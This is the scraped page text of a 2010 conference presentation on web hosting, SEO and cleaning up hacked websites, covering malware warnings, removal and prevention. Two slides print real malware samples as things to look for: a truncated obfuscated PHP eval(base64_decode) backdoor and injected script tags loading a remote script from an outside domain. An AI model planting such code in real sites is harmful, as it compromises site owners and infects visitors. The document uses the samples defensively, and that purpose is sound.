Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.

Like this presentation? Why not share!

Like this? Share it with your network


2010 11 pubcon_hendison-hosting

Uploaded on

Scott Hendisons Pubcon 2010 presentation on web hosting and SEO

Scott Hendisons Pubcon 2010 presentation on web hosting and SEO

More in: Technology , Design
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads


Total Views
On Slideshare
From Embeds
Number of Embeds



Embeds 57

http://www.pdxtc.com 44
http://www.seoautomatic.com 13

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

    No notes for slide


  • 1. Hosting & SEO Scott Hendison Search Commander, Inc. SEO Automatic
  • 2. About Scott Hendison
    • Began “hosting“ websites in 1997 with one server in our retail computer store, with standard DSL
    • Grew to 11 servers then switched to a sort of “datacenter co-op“ a few years ago, all in the same local facility in Gresham Oregon.
    • Not our primary business, but we still host over 1000 domains today, as well as maintain end-user hosting accounts on several major hosts.
  • 3. Web Hosting and SEO
    • I've been on this panel three times and discussed –
      • shared vs. dedicated servers
      • Static vs. shared IP addresses
      • Apache 1 vs Apache 2
      • Apache vs. Windows
      • .htaccess
      • mod_rewrite
      • Windows IIS rewriting options
      • Server speed and performance
      • and other riveting subjects trying to better relate to SEO
  • 4. Web Hosting and SEO
    • Speed and Performance
    • I “predicted” at Pubcon 2009 that speed will soon matter for organic, then Matt Cutts announced next day
    • Not a risky prediction, considering Adwords Quality Scores
    • Speed as ranking factor began “counting” April 9, 2010
    • Google has two great tools
      • Page Speed for Firefox – (download inside Webmaster Tools)
      • Google Chrome (right click in Chrome and “inspect element”)
  • 5. But I‘m Not Talking About Speed
    • Far more important
    • The #1 killer of websites
    • The thing that drives visitors away in droves
    • Drains PPC money as fast as possible
    • Google stops people from even arriving at your site!
    • I’m talking about…
  • 6. Malware
  • 7. Malware
    • Nothing can fully protect users from getting viruses
    • Viruses can steal the BEST passwords & logins
    • If you don’t get one, contractors, employees or family probably will, infecting your network.
    • People should use index cards and a fireproof safe
    • But that’s pretty unrealistic, so learn to deal with disasters
  • 8. Malware identification
    • Nearly 15% of “our” sites were hacked in 2010
    • Most were self inflicted through laziness and stupidity
    • The hacks really didn’t vary all that much
    • Getting rid of hacks can be a headache
    • Getting back into Google isn’t very difficult
    • Protecting yourself FROM hacks is getting easier, but…
    • Sadly, the hacking keeps getting easier…
  • 9. Malware
    • Identification
    • Removal
    • Prevention
  • 10. Identification
    • You can get notified by a client or customer
    • You discover it in a browser or AV warning
    • You can see your site flagged in the SERPS
    • You can get notified by Google WMT – (sometimes)
  • 11. Malware Warnings
  • 12. Warnings in the SERPS!
  • 13. Interstitial Page
  • 14. #1 Conversion Killer
    • Nothing hurts you more than if people wont come to your site in the first place.
    • Once you‘ve identified a problem, what can you do?
      • Clean up the offending code
      • Beg Google for a clean bill of health
    • Email with questions: [email_address]
  • 15. Removal
    • Most hacks we saw were pretty similar
    • Cross Site Scripting (XSS) and SQL Injection
    • Adding links and adding hosted scripts
    • Hackers want to add links to your site
    • Hackers want to add scripts to infect users with viruses which in turn, steal more passwords
    • Not too technical - Look for strange javascripts!
  • 16. Removal
  • 17. Removal
  • 18. Removal
    • If WMT is no help, then look at files manually
    • Use backups and file comparison tools
    • Check recent change dates
    • Look for things that don‘t belong, often in pages named index, home, and default - in .php and .html extensions
    • Look in headers and footers too
  • 19. Removal
    • <?php
    • eval(base64 _decode('aWYoIWlzc2V0KCRtNzc5djEpKXtmdW5jdGlvbiBtNzc5digkcyl7aWYocHJlZ19tY<snip> XRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjJ203Nzl2MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>
    • (<snipped> goes on for dozens of lines )
  • 20. Removal
    • Usually index, home, header and footer –
    • <script src=http://domainX.ac.jp/course/VIVID.php ></script>
    • And in most or all javascript files -
    • document.write('<script src=http://domainX.ac.jp/course/VIVID.php ></script>');&quot;
  • 21. Removal
    • Not all that complicated, just tedious.
    • Search files for <script src=http:// and make sure you recognize them all, and search for eval(base64 too.
    • Overly simplistic to say “clean it up“ but others have likely had your same problem.
    • Google for it w/ quotes to find YOUR exact code.
    • Get a quick look at your site w/ free tool at http://UnmaskParasites.com
  • 22. Once You‘re Clean
  • 23. Once You‘re Clean
    • Write something like this –
    • Thank you for identifying our malware problem, and we believe all is now cleaned up. We have verified that we're clean using an online scanner - http://www.unmaskparasites.com - and would appreciate a speedy resolution.
    • Thank you,
    • Scott Hendison
  • 24. Once You‘re Clean
    • Document your process and improve it
    • Get ready to have it happen again
    • Begin to protect yourself – Get paranoid.
  • 25. Prevention
    • FTP Passwords
      • Don't share FTP access – make new users instead.
      • NEVER use a dictionary word in the password
      • Use at least 8 characters (some people will say 20+)
      • Mix Upper Case, Lower Case, numerals and symbols
      • CHANGE passwords without telling your dev people every few months.
    • Stop using plain old FTP - WinSCP is free SFTP
  • 26. Prevention
    • Using a CMS?
    • Find the documentation on locking it down
    • Do ALL system updates
    • Do ALL released security patches
    • Routine maintenance (just like WMT & Analytics)
    • More popular = more vulnerable, like WordPress
  • 27. Prevention
    • Nearly 8% of all sites are now WordPress*
    • We work in Wordpress 95% of the time
    • Same thing that makes it great makes it riskier
    • Amazing plugins have been developed for safety
    • Common threats have easy solutions
    • * Supposedly said my Matt Mullenweg at one of the 2010 WordCamp, but I can‘t prove it.
  • 28. Prevention
  • 29. Prevention
  • 30. Prevention
  • 31. Prevention
  • 32. Prevention
    • Total prevention may be impossible. Be prepared!
    • Backup restoration sometimes faster than repair
    • Hosts can may keep backups 7 days, or even less!
    • Get weekly (or daily) backups in place & off-host
    • Store a year of monthly backups at AWS
    • Document the entire restore process and TEST
    • Your site hack is generally not the webhosts fault!
  • 33. Take-aways
    • FAR more important than your SEO
    • Dig into Webmaster Tools malware area
    • Change all FTP Passwords asap, & consider SFTP
    • Check for updated versions on forms, and on your CMS
    • Get backup and restore processes in pl ace NOW
  • 34. Thank You
    • WordPress Lunch Table Thursday 1:30
    • Scott Hendison
    • Search Commander, Inc.
    • [email_address]